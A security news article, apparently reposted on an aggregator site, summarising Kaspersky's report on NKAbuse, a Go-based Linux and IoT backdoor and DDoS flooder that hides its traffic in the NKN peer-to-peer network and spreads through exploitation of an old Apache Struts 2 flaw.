Complex NKAbuse Malware Uses Blockchain to Hide on Linux, IoT Machines

The multifaceted malware leverages the NKN blockchain-based peer-to-peer networking protocol, operating as both a sophisticated backdoor and a flooder launching DDoS attacks.

A sophisticated and versatile malware called NKAbuse has been discovered operating as both a flooder and a backdoor, targeting Linux desktops in Colombia, Mexico, and Vietnam.
According to a report this week from Kaspersky, this cross-platform threat, written in Go, exploits the NKN blockchain-oriented peer-to-peer networking protocol. NKAbuse can infect Linux systems, as well as Linux-derived architectures like MISP and ARM — which places Internet of Things (IoT) devices at risk as well.
The decentralized
NKN network
hosts more than 60,000 official nodes, and employs various routing algorithms to streamline data transmission by identifying the most efficient node pathway toward a given payloads destination.
Lisandro Ubiedo, security researcher at Kaspersky, explains that what makes this malware unique is the use of the NKN technology to receive and send data from and to its peers, and its use of Go to generate different architectures, which could infect different types of systems.
It functions as a backdoor to grant unauthorized access, with most of its commands centering on persistence, command execution, and information gathering. The malware can, for instance, capture screenshots by identifying display bounds, convert them to PNG, and transmit them to the bot master, according to
Kasperskys malware analysis of NKAbuse
.
Simultaneously, it acts as a flooder, launching destructive distributed denial of service (DDoS) attacks that can disrupt targeted servers and networks, carrying the risk of significantly impacting organizational operations.
It is a powerful Linux implant with flooder and backdoor capabilities that can attack a target simultaneously using multiple protocols like HTTP, DNS, or TCP, for example, and can also allow an attacker control the system and extract information from it, Ubiedo says. All in the same implant.
The implant also includes a Heartbeat structure for regular communication with the bot master, storing data on the infected host like PID, IP address, memory, and configuration.
He adds that before this malware went live in the wild, there was a proof-of-concept (PoC) called NGLite that explored the possibility of using NKN as a remote administration tool, but it wasnt as extensively developed nor as fully armed as NKAbuse.
Peer-to-peer networks have previously been used to
distribute malware
, including a cloud worm discovered by Palo Alto Networks Unit 42 in July 2023, thought to be the first stage of a wider
cryptomining operation
.
And in October, the ClearFake campaign was discovered utilizing
proprietary blockchain tech
to conceal harmful code, distributing malware like RedLine, Amadey, and Lumma through deceptive browser update campaigns.
That campaign, which uses a technique called EtherHiding, showcased how attackers are exploiting blockchain beyond cryptocurrency theft, highlighting its use in concealing diverse malicious activities.
[The] use of blockchain technology ensures both reliability and anonymity, which indicates the potential for this botnet to expand steadily over time, seemingly devoid of an identifiable central controller, the Kaspersky report noted.
Notably, the malware has no self-propagation mechanism — instead, it relies on someone exploiting a vulnerability to deploy the initial infection. In the attacks that Kaspersky observed, for instance, the attack chain began with the exploitation of an old vulnerability in Apache Struts 2 (CVE-2017-5638, which is incidentally the same bug used to kick off the
massive Equifax data breach of 2017
).
Thus, to prevent targeted attacks by known or unknown threat actors using NKAbuse, Kaspersky advises organizations keep operating systems, applications, and antivirus software updated to address known vulnerabilities.
After a successful exploit, the malware then infiltrates victim devices by running a remote shell script (setup.sh) hosted by attackers, which downloads and executes a second-stage malware implant tailored to the target OS architecture, stored in the /tmp directory for execution.
As a result, the security firm also recommends deployment of endpoint detection and response (EDR) solutions for post-compromise cyber-activity detection, investigation, and prompt incident remediation.

Last News
▸ ArcSight prepares for future at user conference post HP acquisition. ◂ Discovered: 07/01/2025 Category: security	▸ Samsung Epic 4G: First To Use Media Hub ◂ Discovered: 07/01/2025 Category: security	▸ Many third-party software fails security tests ◂ Discovered: 07/01/2025 Category: security

**Cyber Security Categories**
Google Dorks Database	Exploits Vulnerability	Exploit Shellcodes

CVE List

Tools/Apps

News/Aarticles

Phishing Database

Deepfake Detection

Trends/Statistics & Live Infos

Tags:
Complex NKAbuse Malware Uses Blockchain to Hide on Linux, IoT Machines